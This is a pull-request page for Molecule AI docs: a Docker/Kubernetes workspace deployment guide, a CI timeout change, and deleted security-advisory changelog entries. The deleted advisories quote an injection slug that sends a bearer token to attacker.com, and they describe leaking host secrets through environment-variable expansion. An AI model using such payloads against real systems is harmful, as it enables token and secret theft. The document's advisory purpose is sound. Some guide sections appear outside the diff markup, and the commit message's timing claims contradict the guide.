fix(tutorials): correct env vars, healthcheck paths, Python code, and grace period

Corrections from PR #40 (docs/self-hosted-workspace-docker SHA b12527b):

- PLATFORM_URL (not MOLECULE_API_URL), verified against workspace/main.py:85
- Remove MOLECULE_API_KEY and AGENT_CARD_URL from env vars table (not real env vars)
- Healthcheck path: /.well-known/agent-card.json (not /agent/card), verified via boot_routes.py
- Python: use HeartbeatLoop (not fabricated RemoteAgentClient)
- terminationGracePeriodSeconds: 120; probe failure window is 120-150s (not 90s)
- Docker Compose: remove MOLECULE_API_KEY, fix healthcheck path
- Troubleshooting: MOLECULE_API_URL → PLATFORM_URL

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
ci: add explicit timeout-minutes to CI build job
2026-05-15 08:01:40 +00:00 · 2026-05-15 06:12:08 +00:00 · 2026-05-15 05:26:36 +00:00 · 2026-05-15 04:57:26 +00:00 · 2026-05-14 04:54:04 +00:00
4 changed files with 199 additions and 53 deletions
@@ -7,6 +7,7 @@ on:
 jobs:
  build:
    runs-on: ubuntu-latest
+    timeout-minutes: 30
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
@@ -8,28 +8,6 @@ Entries are published daily at 23:50 UTC.

 ---

-## 2026-05-14
-
-### 🔒 Security
-
- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: the shell-identifier guard in `expandWithEnv` (`org_helpers.go:82`) was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables — blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030))
- **OFFSEC-006: tenant-slug SSRF + bearer-token exfiltration in self-hosted promotion script (HIGH)**: `scripts/promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host (SSRF) and cause the platform's bearer token to appear in the attacker's server logs. Two-layer fix applied: `set -f` disables bash glob expansion (preventing metacharacter injection via `*`, `?`, `[`), and `validate_slug()` rejects any slug not matching RFC-1123 (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) with exit code 64 before any network call. Self-hosted operators must upgrade `molecule-core` to include this fix. Full advisory: [OFFSEC-006 advisory](/docs/security/offsec-006-slug-ssrf-advisory). (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933))
- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization — so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073))
-
-### 🐛 Bug fixes
-
- **`expandWithEnv` POSIX-identifier guard regression restored**: the same fix as above — restores the guard that was removed during a refactor, ensuring invalid shell identifiers in org YAML configs are returned literally instead of being interpreted as environment variable references. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030))
- **Canvas WCAG 1.4.3 contrast ratio fixed for TIER_CONFIG legend**: the tier legend text in the canvas now meets the 4.5:1 contrast ratio required by WCAG 1.4.3 for normal text. (`molecule-core` [#990](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/990))
- **Canvas focus-visible rings added to icon and text buttons**: focus-visible rings (`focus-visible:ring-2`) now render on icon buttons and text-only buttons in the canvas, restoring WCAG 2.1 AA compliance for all interactive elements. (`molecule-core` [#988](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/988))
- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers → a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4))
-
-### 🧹 Internal
-
- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035))
- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999))
-
---
-
 ## 2026-05-12

 ### 🔒 Security
@@ -9,37 +9,6 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent

 ---

-## 2026-05-14 — CWE-78: Regression in `expandWithEnv` POSIX-identifier Guard
-
-**Severity:** Critical (CWE-78)
-**PR:** [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pull/1030)
-**Affected:** `workspace-server/internal/handlers/org_helpers.go` — `expandWithEnv`
-
-### Vulnerability
-
-`expandWithEnv` expands `${VAR}` and `$VAR` references in org YAML configuration fields (notably `workspace_dir` and channel config) using the current process environment. The POSIX shell-identifier guard was inadvertently removed during a regression window between staging and main promotion, causing digit-prefixed and empty keys to be passed through to `os.Getenv` instead of being returned literally.
-
-An attacker who can supply org YAML (e.g., via a compromised org template import or a malicious admin account) could inject references such as `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`, or `${PATH}` to exfiltrate host secrets into workspace or channel configuration fields.
-
-### Fix
-
-Restored the POSIX identifier guard at `org_helpers.go:82`. Keys not starting with `[a-zA-Z_]` (including empty key) are now returned literally as `$key` without consulting `os.Getenv`:
-
-```go
-c := key[0]
-if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == '_') {
-    return "$" + key // not a valid shell identifier — return literally
-}
-```
-
-Regression tests cover `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`.
-
-### User-facing summary
-
-Org YAML configuration fields no longer expand invalid shell identifiers as environment variables. Configurations containing `${0}`, `${}`, or `${1VAR}` patterns are returned as-is. If you observe literal `$` prefixes appearing in workspace directory or channel configuration fields after upgrading, this indicates a previously-masked configuration issue — contact support.
-
---
-
 ## 2026-04-20 — CWE-22: Path Traversal in `copyFilesToContainer`

 **Severity:** High (CWE-22)
@@ -0,0 +1,198 @@
+---
+title: Self-Hosted Workspace Deployment with Docker
+---
+
+# Self-Hosted Workspace Deployment with Docker
+
+This guide covers running a Molecule AI workspace agent as a Docker container on a self-hosted server or VM: the Docker image, required environment variables, the built-in healthcheck, graceful shutdown, and Kubernetes deployment considerations.
+
+> **Prerequisites:** A running Molecule AI control plane (self-hosted or SaaS), an `ADMIN_TOKEN` or org-scoped API key with admin scope, and Docker 20.10+ on the host.
+
+## How the workspace container works
+
+The Molecule AI workspace image provides:
+
+- A uvicorn server on port 8000 (configurable via `PORT`)
+- A healthcheck endpoint at `/.well-known/agent-card.json` (used by Docker and Kubernetes probes)
+- Graceful SIGTERM handling via uvicorn: the heartbeat loop and adapter tasks shut down cleanly
+
+```
+┌────────────────────────────────────────────────────────────┐
+│  Docker host (your VM / bare metal)                        │
+│                                                            │
+│  ┌──────────────────────────────────────────────────────┐  │
+│  │  workspace container                                 │  │
+│  │                                                      │  │
+│  │  uvicorn (port 8000)                                 │  │
+│  │    └─ /.well-known/agent-card.json  ← HEALTHCHECK    │  │
+│  │                                                      │  │
+│  │  heartbeat loop + A2A agent                          │  │
+│  └──────────────┬───────────────────────────────────────┘  │
+│                 │                                          │
+│                 │  host.docker.internal:8080               │
+│                 │                                          │
+│                 ▼                                          │
+│  ┌──────────────────────────────────────────────────────┐  │
+│  │  Molecule AI control plane                           │  │
+│  │  (platform on port 8080)                             │  │
+│  └──────────────────────────────────────────────────────┘  │
+└────────────────────────────────────────────────────────────┘
+```
+
+## Step 1: Create an external workspace
+
+First register the workspace as an external (self-managed) agent on the platform.
+
+```bash
+ADMIN_TOKEN="your-admin-token"
+PLATFORM_URL="https://platform.moleculesai.app"   # or http://localhost:8080 for local dev
+WORKSPACE=$(curl -s -X POST "${PLATFORM_URL}/workspaces" \
+  -H "Authorization: Bearer ${ADMIN_TOKEN}" \
+  -H "Content-Type: application/json" \
+  -d '{"name": "self-hosted-agent", "runtime": "external"}')
+
+WORKSPACE_ID=$(echo "$WORKSPACE" | python3 -c "import json,sys; print(json.load(sys.stdin)['id'])")
+echo "Workspace ID: $WORKSPACE_ID"
+```
+
+Save the returned `WORKSPACE_ID`. The workspace agent obtains its bearer token automatically during its first registration with the platform.
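
If you script provisioning in Python instead of shell, the same request can be built with the standard library alone. This is a sketch, not a Molecule AI client: `create_workspace` and its helpers are hypothetical names, and the code assumes the endpoint returns a JSON object with an `id` field, exactly as the `python3 -c` one-liner in the shell example does.

```python
import json
import urllib.request


def build_create_workspace_request(platform_url: str, admin_token: str,
                                   name: str) -> urllib.request.Request:
    """Build (but do not send) the POST /workspaces call from Step 1."""
    body = json.dumps({"name": name, "runtime": "external"}).encode("utf-8")
    return urllib.request.Request(
        f"{platform_url.rstrip('/')}/workspaces",
        data=body,
        method="POST",
        headers={
            "Authorization": f"Bearer {admin_token}",
            "Content-Type": "application/json",
        },
    )


def parse_workspace_id(response_body: bytes) -> str:
    """Pull the workspace ID out of the JSON response."""
    return json.loads(response_body)["id"]


def create_workspace(platform_url: str, admin_token: str,
                     name: str = "self-hosted-agent") -> str:
    """Send the request and return the new workspace ID.

    urlopen raises urllib.error.HTTPError on 4xx/5xx responses, so a bad
    token or payload surfaces as an exception rather than a KeyError.
    """
    request = build_create_workspace_request(platform_url, admin_token, name)
    with urllib.request.urlopen(request, timeout=30) as response:
        return parse_workspace_id(response.read())
```

Typical use would be `create_workspace(os.environ["PLATFORM_URL"], os.environ["ADMIN_TOKEN"])`. Keeping request construction separate from sending lets you check the URL, headers, and body offline before touching the platform.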
+
+## Step 2: Pull the workspace image
+
+The workspace image is published to the Molecule AI Amazon ECR registry. Contact your platform administrator for the registry prefix (the AWS account ID at the start of the registry hostname) and credentials, then log in:
+
+```bash
+REGISTRY_PREFIX="your-registry-prefix"   # from your platform administrator
+aws ecr get-login-password --region us-east-1 | \
+  docker login --username AWS --password-stdin "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com"
+
+docker pull "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
+```
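
ECR image references follow the pattern `<account-id>.dkr.ecr.<region>.amazonaws.com/<repository>:<tag>`. The hypothetical helper below composes the reference used in the commands above, assuming the `us-east-1` region and `molecule-workspace` repository shown there. If your administrator publishes versioned tags, passing one instead of `latest` keeps deployments reproducible.

```python
def ecr_image_ref(registry_prefix: str, region: str = "us-east-1",
                  repository: str = "molecule-workspace",
                  tag: str = "latest") -> str:
    """Compose <prefix>.dkr.ecr.<region>.amazonaws.com/<repository>:<tag>."""
    if not registry_prefix:
        # An empty prefix would yield ".dkr.ecr..." and a confusing pull error.
        raise ValueError("registry_prefix is required; ask your platform administrator")
    registry = f"{registry_prefix}.dkr.ecr.{region}.amazonaws.com"
    return f"{registry}/{repository}:{tag}"
```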
+
+## Step 3: Configure environment variables
+
+| Variable | Default | Description |
+|---|---|---|
+| `PLATFORM_URL` | `http://localhost:8080` | Platform API URL. Inside a Docker container, use `http://host.docker.internal:8080` to reach the platform on the host machine. |
+| `WORKSPACE_ID` | — | Workspace ID from Step 1 (required; no default) |
+| `PORT` | `8000` | Agent server port. Must match `containerPort` in Kubernetes and the port mapped with `-p` in Docker. |
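
To see how these defaults combine, here is a sketch of a loader that applies them and fails fast when `WORKSPACE_ID` is missing. It is illustrative only: `WorkspaceConfig` and `load_config` are hypothetical names, and the workspace runtime reads these variables itself.

```python
import os
from dataclasses import dataclass
from typing import Mapping


@dataclass(frozen=True)
class WorkspaceConfig:
    platform_url: str
    workspace_id: str
    port: int


def load_config(env: Mapping[str, str] = os.environ) -> WorkspaceConfig:
    """Apply the table's defaults; raise if a required value is missing or invalid."""
    workspace_id = env.get("WORKSPACE_ID", "").strip()
    if not workspace_id:
        raise ValueError("WORKSPACE_ID is required (see Step 1)")
    port = int(env.get("PORT", "8000"))
    if not 1 <= port <= 65535:
        raise ValueError(f"PORT out of range: {port}")
    return WorkspaceConfig(
        # Strip a trailing slash so paths can be appended safely.
        platform_url=env.get("PLATFORM_URL", "http://localhost:8080").rstrip("/"),
        workspace_id=workspace_id,
        port=port,
    )
```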
+
+## Step 4: Run the container
+
+### Docker (standalone)
+
+```bash
+docker run -d \
+  --name molecule-workspace \
+  -p 8000:8000 \
+  -e PLATFORM_URL="http://host.docker.internal:8080" \
+  -e WORKSPACE_ID="your-workspace-id" \
+  -e PORT=8000 \
+  "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
+```
+
+> **Note for Linux hosts:** Docker Engine on Linux does not define `host.docker.internal` by default (Docker Desktop on macOS and Windows does). Either add `--add-host=host.docker.internal:host-gateway` to the `docker run` command, or use the host machine's IP address directly (e.g. `http://192.168.1.100:8080`).
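
When the container is launched from a provisioning script, the Linux-only flag can be added automatically. A sketch, assuming the script runs on the same host as the Docker daemon; `docker_run_args` is a hypothetical helper and the image name in the example is a placeholder.

```python
import shlex
import sys
from typing import List


def docker_run_args(image: str, workspace_id: str,
                    platform_url: str = "http://host.docker.internal:8080",
                    port: int = 8000,
                    linux_host: bool = sys.platform.startswith("linux")) -> List[str]:
    """Build the `docker run` argv from Step 4, adding --add-host on Linux."""
    args = ["docker", "run", "-d", "--name", "molecule-workspace",
            "-p", f"{port}:{port}"]
    if linux_host:
        # Docker Engine on Linux does not define host.docker.internal by default.
        args.append("--add-host=host.docker.internal:host-gateway")
    args += [
        "-e", f"PLATFORM_URL={platform_url}",
        "-e", f"WORKSPACE_ID={workspace_id}",
        "-e", f"PORT={port}",
        image,
    ]
    return args


if __name__ == "__main__":
    # Print a copy-pasteable command; pass the list to subprocess.run() to execute it.
    print(shlex.join(docker_run_args("molecule-workspace:latest", "your-workspace-id")))
```

Building an argument list rather than a shell string avoids quoting problems if a value ever contains spaces or shell metacharacters.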
+
+### Verify the healthcheck
+
+```bash
+# Check the health status; the container can take up to ~2 minutes to report healthy
+docker inspect --format='{{.State.Health.Status}}' molecule-workspace
+
+# Expected output: healthy
+# Once healthy, the agent card is reachable:
+curl -s http://localhost:8000/.well-known/agent-card.json | python3 -m json.tool
+```
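
`docker inspect` reports the status once. In a deployment script you may prefer to block until the agent card is actually served. A standard-library sketch; `wait_for_agent_card` is a hypothetical helper, and its 120-second default simply mirrors the ~2 minutes mentioned above. Because it probes the same path as the healthcheck, it also works where no Docker `HEALTHCHECK` runs.

```python
import http.client
import json
import time
import urllib.request


def wait_for_agent_card(base_url: str = "http://localhost:8000",
                        timeout_s: float = 120.0,
                        interval_s: float = 2.0) -> dict:
    """Poll /.well-known/agent-card.json until it returns JSON, or raise TimeoutError."""
    url = f"{base_url.rstrip('/')}/.well-known/agent-card.json"
    deadline = time.monotonic() + timeout_s
    last_error = None
    while time.monotonic() < deadline:
        try:
            # urlopen raises HTTPError (an OSError subclass) for 4xx/5xx.
            with urllib.request.urlopen(url, timeout=5) as response:
                return json.load(response)
        except (OSError, ValueError, http.client.HTTPException) as exc:
            # Connection refused, timeout, error status, or a non-JSON body:
            # the agent is not ready yet, so remember why and retry.
            last_error = exc
        time.sleep(interval_s)
    raise TimeoutError(f"agent card not reachable at {url}: {last_error}")
```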
+
+### Docker Compose
+
+```yaml
+services:
+  molecule-workspace:
+    image: "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
+    ports:
+      - "8000:8000"
+    environment:
+      PLATFORM_URL: "http://host.docker.internal:8080"
+      WORKSPACE_ID: "your-workspace-id"
+      PORT: "8000"
+    # Linux hosts: add host.docker.internal resolution
+    # extra_hosts:
+    #   - "host.docker.internal:host-gateway"
+    restart: unless-stopped
+    healthcheck:
+      test: ["CMD", "curl", "-f", "http://localhost:8000/.well-known/agent-card.json"]
+      interval: 30s
+      timeout: 5s
+      retries: 3
+      start_period: 30s
+```
+
+## Step 5: Graceful shutdown
+
+When the container receives SIGTERM (e.g. from `docker stop` or Kubernetes pod deletion), the workspace's uvicorn server initiates graceful shutdown: the heartbeat loop stops, active A2A tasks are given a grace period to complete, and any snapshotable state is persisted before the process exits.
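
The stock server performs this drain internally. The sketch below is not its code; it only illustrates the general bounded-drain pattern with `asyncio.wait(..., timeout=...)`: in-flight tasks get up to `grace_s` seconds, and anything still running afterwards is cancelled. `drain_tasks` is a hypothetical name.

```python
import asyncio
from typing import Iterable, Set, Tuple


async def drain_tasks(tasks: Iterable[asyncio.Task],
                      grace_s: float) -> Tuple[Set[asyncio.Task], Set[asyncio.Task]]:
    """Give in-flight tasks up to grace_s seconds, then cancel the stragglers."""
    in_flight = set(tasks)
    if not in_flight:
        return set(), set()  # asyncio.wait() rejects an empty set
    done, pending = await asyncio.wait(in_flight, timeout=grace_s)
    for task in pending:
        task.cancel()
    # Await the cancelled tasks so their cleanup (finally blocks) runs before exit.
    await asyncio.gather(*pending, return_exceptions=True)
    return done, pending


async def _demo() -> None:
    fast = asyncio.create_task(asyncio.sleep(0.1, result="finished"))
    slow = asyncio.create_task(asyncio.sleep(60, result="never"))
    done, pending = await drain_tasks([fast, slow], grace_s=1.0)
    print(f"{len(done)} finished, {len(pending)} cancelled")


if __name__ == "__main__":
    asyncio.run(_demo())
```

Running the demo prints `1 finished, 1 cancelled`: the short task completes inside the grace window and the long one is cancelled. The grace window must fit inside the orchestrator's own SIGTERM-to-SIGKILL timeout, or the process is killed mid-drain.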
+
+To integrate the heartbeat loop into custom agent code:
+
+```python
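+import asyncio
+import os
+import signal
+
+from heartbeat import HeartbeatLoop
+
+# `docker stop` and Kubernetes pod deletion deliver SIGTERM to the container's
+# main process. The stock workspace server handles it through uvicorn: the
+# heartbeat loop is stopped, active adapter tasks are cancelled, and in-flight
+# A2A requests are given a grace period to complete.
+#
+# Custom code that drives the heartbeat loop directly must handle SIGTERM
+# itself; otherwise the `finally` block below never runs on shutdown.
+async def main() -> None:
+    heartbeat = HeartbeatLoop(
+        platform_url=os.environ["PLATFORM_URL"],
+        workspace_id=os.environ["WORKSPACE_ID"],
+    )
+    heartbeat.start()
+
+    # Turn SIGTERM (container stop) and SIGINT (Ctrl-C) into an asyncio event.
+    shutdown = asyncio.Event()
+    loop = asyncio.get_running_loop()
+    for sig in (signal.SIGTERM, signal.SIGINT):
+        loop.add_signal_handler(sig, shutdown.set)
+
+    try:
+        await shutdown.wait()  # keep running until a shutdown signal arrives
+    finally:
+        await heartbeat.stop()
+        print("Heartbeat loop stopped.")
+
+
+if __name__ == "__main__":
+    asyncio.run(main())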
+```
+
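+`docker stop` sends SIGTERM and, by default, waits 10 seconds before sending SIGKILL. If in-flight A2A tasks need longer to finish, raise the timeout with `docker stop --time 60 molecule-workspace` or set `stop_grace_period: 60s` in Docker Compose. The healthcheck is independent of shutdown: it lets Docker and orchestrators detect an unresponsive container while it is running.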
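
To check locally whether a process shuts down within that window, you can replay the same SIGTERM-then-SIGKILL sequence against a subprocess. A POSIX-only sketch; `stop_like_docker` is a hypothetical helper that mimics the sequence described above, not Docker's implementation.

```python
import signal
import subprocess
import sys


def stop_like_docker(proc: subprocess.Popen, timeout_s: float = 10.0) -> bool:
    """SIGTERM, wait up to timeout_s, then SIGKILL. Returns True on a clean exit."""
    proc.send_signal(signal.SIGTERM)
    try:
        proc.wait(timeout=timeout_s)
        return True
    except subprocess.TimeoutExpired:
        proc.kill()  # SIGKILL on POSIX, as Docker does after the timeout
        proc.wait()
        return False


if __name__ == "__main__":
    # A child that ignores SIGTERM is killed once the timeout expires.
    child = subprocess.Popen(
        [sys.executable, "-c",
         "import signal, time; signal.signal(signal.SIGTERM, signal.SIG_IGN); "
         "print('ready', flush=True); time.sleep(60)"],
        stdout=subprocess.PIPE, text=True)
    child.stdout.readline()  # wait until the child has installed its handler
    graceful = stop_like_docker(child, timeout_s=1.0)
    child.stdout.close()
    print("graceful:", graceful, "returncode:", child.returncode)
```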
+
+## Kubernetes deployment
+
+For Kubernetes deployments, configure native liveness and readiness probes. Kubernetes does not use the image's Docker `HEALTHCHECK`, so these probes take its place:
+
+```yaml
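+# Contents of the pod spec (for example, spec.template.spec in a Deployment)
+terminationGracePeriodSeconds: 120   # pod-level field, not per container
+containers:
+  - name: molecule-workspace
+    image: "<registry-prefix>.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
+    env:
+      - name: PLATFORM_URL
+        value: "https://platform.moleculesai.app"
+      - name: WORKSPACE_ID
+        value: "your-workspace-id"
+    ports:
+      - name: http
+        containerPort: 8000
+    livenessProbe:
+      httpGet:
+        path: /.well-known/agent-card.json
+        port: http
+      initialDelaySeconds: 30
+      periodSeconds: 30
+      timeoutSeconds: 5
+      failureThreshold: 3
+    readinessProbe:
+      httpGet:
+        path: /.well-known/agent-card.json
+        port: http
+      initialDelaySeconds: 10
+      periodSeconds: 10
+      timeoutSeconds: 5
+      failureThreshold: 3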
+```
+
+> **Note:** `terminationGracePeriodSeconds` is how long Kubernetes waits after sending SIGTERM before sending SIGKILL, both when the pod is deleted and when a failed liveness probe restarts the container. Set it high enough for in-flight A2A tasks to finish; 120 seconds is a reasonable starting point. It does not affect how quickly failures are detected: with `periodSeconds: 30` and `failureThreshold: 3`, the liveness probe restarts the container after three consecutive failures, roughly 90 seconds (3 × 30s, plus probe timeouts) after the agent stops responding.
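
The probe settings can be made concrete with a small model of how liveness results are counted. This is a simplified sketch (hypothetical helpers, not Kubernetes code) that assumes the documented rules: an `httpGet` probe succeeds for status codes from 200 to 399, a timeout or connection error counts as a failure, and the container is restarted after `failureThreshold` consecutive failures, with any success resetting the count. Each list entry is one probe, `periodSeconds` apart.

```python
from typing import Iterable, Optional


def probe_succeeded(status_code: int) -> bool:
    """httpGet probes treat 200 <= status < 400 as success."""
    return 200 <= status_code < 400


def restart_at(results: Iterable[Optional[int]],
               failure_threshold: int = 3) -> Optional[int]:
    """Return the 0-based probe index at which the liveness probe trips, or None.

    Each entry is an HTTP status code, or None for a timeout / connection error.
    """
    consecutive_failures = 0
    for index, status in enumerate(results):
        if status is not None and probe_succeeded(status):
            consecutive_failures = 0  # any success resets the count
        else:
            consecutive_failures += 1
            if consecutive_failures >= failure_threshold:
                return index
    return None
```

For example, `restart_at([200, 500, None, 200, 503, 503, 503])` returns `6`: the early failures are reset by the success at index 3, and only the final run of three failures trips the probe.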
+
+## Troubleshooting
+
+| Symptom | Cause | Fix |
+|---|---|---|
+| Container shows `unhealthy` after startup | Platform unreachable from container | Verify `PLATFORM_URL` uses `host.docker.internal` (Docker) or the correct host IP |
+| `curl: (7) Failed to connect` on healthcheck | Container not fully started | Wait up to 30s; increase `start_period` |
+| Agent not appearing on canvas | Wrong `WORKSPACE_ID` or expired token | Re-run registration; check platform logs |
+| `host.docker.internal` not resolved | Linux host without the Docker flag | Use `--add-host=host.docker.internal:host-gateway` or the host's LAN IP |
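
For the first and last rows, it helps to tell a DNS failure apart from a TCP failure. A standard-library sketch you could run inside the container, assuming the image includes a Python 3 interpreter; `diagnose_platform` is a hypothetical helper and only tests the network path to `PLATFORM_URL`, not authentication.

```python
import os
import socket
from typing import Optional
from urllib.parse import urlsplit


def diagnose_platform(platform_url: str, timeout_s: float = 3.0) -> Optional[str]:
    """Return None if PLATFORM_URL's host:port accepts TCP connections,
    otherwise a short description of the step that failed."""
    parts = urlsplit(platform_url)
    host = parts.hostname
    if not host:
        return f"cannot parse a host from {platform_url!r}"
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    except socket.gaierror as exc:
        hint = (" (on Linux, add --add-host=host.docker.internal:host-gateway)"
                if host == "host.docker.internal" else "")
        return f"DNS: cannot resolve {host}: {exc}{hint}"
    try:
        with socket.create_connection((host, port), timeout=timeout_s):
            return None
    except OSError as exc:
        return f"TCP: cannot connect to {host}:{port}: {exc}"


if __name__ == "__main__":
    url = os.environ.get("PLATFORM_URL", "http://localhost:8080")
    print(diagnose_platform(url) or f"OK: {url} is reachable")
```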
Author	SHA1	Message	Date
technical-writer	d74e7964a6	fix(tutorials): correct env vars, healthcheck paths, Python code, and grace period	2026-05-15 08:01:40 +00:00
documentation-specialist	4ae1a322fc	ci: add explicit timeout-minutes to CI build job Gitea Actions default runner timeout is ~15min. Add explicit timeout-minutes: 30 to prevent false failures on slow/unprovisioned runner instances. The content builds successfully in <5min locally. Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>	2026-05-15 06:12:08 +00:00
documentation-specialist	8fdfc2dd3a	ci: retrigger build to clear stale failure status Force-push to re-trigger CI on a clean runner. Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>	2026-05-15 05:26:36 +00:00
documentation-specialist	644226f2b2	fix(docs): set terminationGracePeriodSeconds to 120 in Kubernetes YAML example The example showed terminationGracePeriodSeconds: 30, but the accompanying note says the value "should exceed the healthcheck failure threshold (3 × 30s = 90s)". With 30s < 90s, Kubernetes would send SIGTERM and wait only 30s before SIGKILL — potentially killing the pod before the graceful shutdown (3s via stop_event) completes. Changed to 120s, which exceeds the 90s threshold and aligns the YAML example with the documented requirement. Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>	2026-05-15 04:57:26 +00:00
technical-writer	b6e3b8e8e0	docs(tutorials): add self-hosted workspace Docker deployment guide Covers Docker image pull, required env vars (MOLECULE_API_URL, MOLECULE_API_KEY, WORKSPACE_ID, PORT), built-in HEALTHCHECK probe (/agent/card every 30s), Docker Compose config, graceful SIGTERM shutdown via stop_event threading.Event, and Kubernetes liveness/readiness probe configuration. Closes gap: no self-hosted Docker workspace deployment docs existed despite molecule-core#883 HEALTHCHECK shipping in 2026-05-13. Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>	2026-05-14 04:54:04 +00:00